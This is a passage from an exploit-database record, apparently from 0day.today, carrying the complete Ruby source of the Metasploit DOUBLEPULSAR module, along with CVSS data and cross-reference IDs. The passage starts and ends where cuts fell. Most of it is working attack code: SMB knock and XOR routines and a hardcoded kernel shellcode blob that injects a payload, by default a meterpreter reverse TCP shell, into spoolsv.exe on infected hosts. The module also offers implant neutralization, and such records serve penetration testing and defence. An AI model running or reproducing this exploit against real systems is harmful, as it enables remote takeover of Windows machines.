\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-09-01] #"}, "lastseen": "2021-09-01T13:26:49", "differentElements": ["title"], "edition": 2}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "961a5474828a43bfaaaf283f267e93f6", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0146", "CVE-2017-0147"], "immutableFields": [], "lastseen": "2021-09-01T16:40:01", "history": [], "viewCount": 93, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:142603", "PACKETSTORM:142548", "PACKETSTORM:146236", "PACKETSTORM:156196"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-29702", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-27802", "1337DAY-ID-27803", "1337DAY-ID-27613"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:41891", "EDB-ID:43970", "EDB-ID:47456"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "nessus", "idList": ["700059.PRM", "700099.PRM", "MS17-010.NASL", "SMB_NT_MS17-010.NASL"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0143", "CVE-2017-0145", "CVE-2017-0148", "CVE-2017-0144", "CVE-2017-0147", "CVE-2017-0146"]}, {"type": "symantec", "idList": ["SMNTC-96703", "SMNTC-96707", "SMNTC-96705", "SMNTC-96706", "SMNTC-96709", "SMNTC-96704"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"]}, {"type": "threatpost", "idList": ["THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:C211C70545FBDF88C2F99362DC4608A8"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0148", "MS:CVE-2017-0145"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC", "MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:9EF85E0CE1D118D27911357B1C516074"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}], "modified": "2019-12-04T03:58:12", "rev": 2}, "score": {"value": 7.7, "vector": "NONE", "modified": "2019-12-04T03:58:12", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-09-01] #"}, "lastseen": "2021-09-01T16:40:01", "differentElements": ["sourceData"], "edition": 3}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "30627fb0f1466f655be2338b12d00f0c", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the 